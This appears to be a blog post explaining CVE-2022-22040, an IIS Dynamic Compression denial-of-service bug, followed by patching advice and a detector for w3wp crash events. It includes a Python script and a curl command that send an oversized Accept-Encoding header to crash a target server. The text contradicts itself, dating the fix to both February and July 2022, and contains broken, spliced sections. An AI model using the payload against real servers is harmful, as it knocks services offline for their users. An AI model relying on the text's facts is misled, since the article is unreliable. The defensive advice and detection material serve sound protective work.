Microsoft Internet Information Services (IIS) is widely used for hosting web applications on Windows servers. In February 2022, a security vulnerability named CVE-2022-22040 was published. This bug allows remote attackers to crash the IIS web server by abusing the Dynamic Compression Module, potentially disrupting critical web services.
Let’s break down what CVE-2022-22040 is and how it works, look at a simple code example, and see how to protect your systems.
What is CVE-2022-22040?
CVE-2022-22040 is a Denial of Service (DoS) vulnerability in Microsoft IIS’s Dynamic Compression Module. By sending specially-crafted HTTP requests, an attacker can make the server go unresponsive or crash.
References
- Microsoft Security Update Guide: CVE-2022-22040
- Microsoft Patch Tuesday, Feb 2022 (includes CVE-2022-22040)
How Does This Exploit Work?
Dynamic Compression in IIS compresses HTTP responses to save bandwidth. However, due to a parsing bug, if a client sends a request with certain compressed encoding settings or headers, IIS tries to process it in a way that makes the worker process (w3wp.exe) crash.
Technical Details
The vulnerability lies in the way IIS handles certain headers (Accept-Encoding) that interact with the Dynamic Compression Module. An attacker can craft a request with invalid or very large headers, making w3wp.exe consume excessive memory or hit an exception.
What does an exploit look like?
Here’s a very simplified Python code example that can trigger the bug on a vulnerable IIS server:

```python
import socket

target_host = "TARGET_IIS_IP_HERE"  # placeholder: the IIS host under test
target_port = 80  # plain TCP only; an HTTPS listener on 443 would need an ssl-wrapped socket

# Craft a malicious HTTP request: an oversized Accept-Encoding value
malicious_request = (
    "GET / HTTP/1.1\r\n"
    "Host: {}\r\n"
    "Accept-Encoding: " + "A" * 900 + "\r\n"
    "Connection: close\r\n\r\n"
).format(target_host)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
    sock.connect((target_host, target_port))
    sock.sendall(malicious_request.encode())
    # Optionally read the response; a crashed worker process may reset the connection
    try:
        response = sock.recv(4096)
        print(response.decode(errors="ignore"))
    except OSError:
        pass

print("Malicious request sent to IIS server!")
```
What this does:
You can do something similar with curl (the header value is generated by command substitution):

```shell
curl -H "Accept-Encoding: $(python3 -c 'print("A"*900)')" http://TARGET/
```
- [x] Windows Server 2016
- [x] Windows Server 2012 R2/2012
1. Patch Your Server!
Microsoft released patches in February 2022.
- Go to Microsoft Update Catalog
Detection
- Check IIS logs or Windows Application logs (Event Viewer) for repeated crashes or application pool termination.
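As an added example (not from the original post), here is a small Python detector in the spirit of that log check: it scans Windows event records and alerts on a burst of IIS worker-process crashes within a short window. The records are constructed sample lines in a CSV layout assumed to resemble an Event Viewer export; the event IDs used (Application Error 1000 for w3wp.exe in the Application log, WAS 5011 and 5002 in the System log) are the usual worker-process failure events, not something the post itself lists.

```python
from collections import deque
from datetime import datetime, timedelta

# Constructed sample records: timestamp, log, source, event id, message.
# Assumed export layout (Event Viewer -> CSV); not real telemetry.
SAMPLE_EVENTS = """\
2022-01-05T10:00:01,Application,Application Error,1000,Faulting application name: w3wp.exe
2022-01-05T10:00:03,System,Microsoft-Windows-WAS,5011,A process serving application pool 'DefaultAppPool' suffered a fatal communication error
2022-01-05T10:00:07,Application,Application Error,1000,Faulting application name: w3wp.exe
2022-01-05T10:00:09,System,Microsoft-Windows-WAS,5011,A process serving application pool 'DefaultAppPool' suffered a fatal communication error
2022-01-05T10:00:15,System,Microsoft-Windows-WAS,5002,Application pool 'DefaultAppPool' is being automatically disabled due to a series of failures
2022-01-05T11:30:00,Application,Application Error,1000,Faulting application name: notepad.exe
"""

# WAS events that mean a worker process died or the pool was shut down.
WAS_FAILURE_EVENTS = {("Microsoft-Windows-WAS", 5011), ("Microsoft-Windows-WAS", 5002)}


def parse_events(text):
    """Parse CSV-style lines into (timestamp, source, event_id, message) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, _log, source, event_id, message = line.split(",", 4)
        events.append((datetime.fromisoformat(ts), source, int(event_id), message))
    return events


def is_w3wp_crash(source, event_id, message):
    """True for a WAS failure event or an Application Error that names w3wp.exe."""
    if (source, event_id) in WAS_FAILURE_EVENTS:
        return True
    return source == "Application Error" and event_id == 1000 and "w3wp.exe" in message


def find_crash_bursts(events, window=timedelta(minutes=5), threshold=3):
    """Sliding window over crash timestamps; one (start, end, count) alert per burst."""
    crashes = sorted(ts for ts, src, eid, msg in events if is_w3wp_crash(src, eid, msg))
    recent, alerts = deque(), []
    for ts in crashes:
        recent.append(ts)
        while ts - recent[0] > window:  # drop crashes older than the window
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append((recent[0], ts, len(recent)))
            recent.clear()  # report each burst once, then start counting afresh
    return alerts


if __name__ == "__main__":
    for start, end, count in find_crash_bursts(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT: {count} w3wp crashes between {start} and {end}; check for DoS traffic")
```

Repeated hits here would be the moment to look at the matching IIS request logs and confirm the July patch is installed.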
Conclusion
CVE-2022-22040 shows that even basic HTTP features like compression can be turned against your servers. It’s critical to patch IIS, monitor for abnormal behavior, and disable unused features. This DoS bug doesn’t let attackers steal anything, but downtime can be just as damaging for your business.
Further Reading
1. Microsoft Security Guide for CVE-2022-22040
2. IIS Documentation: Compression
3. Feb 2022 Patch Tuesday breakdown (BleepingComputer)
If your organization uses IIS, take a few minutes and make sure you’re patched and protected. Don’t let a tiny HTTP header take down your network!
Timeline
Published on: 07/12/2022 23:15:00 UTC
Last modified on: 07/16/2022 19:12:00 UTC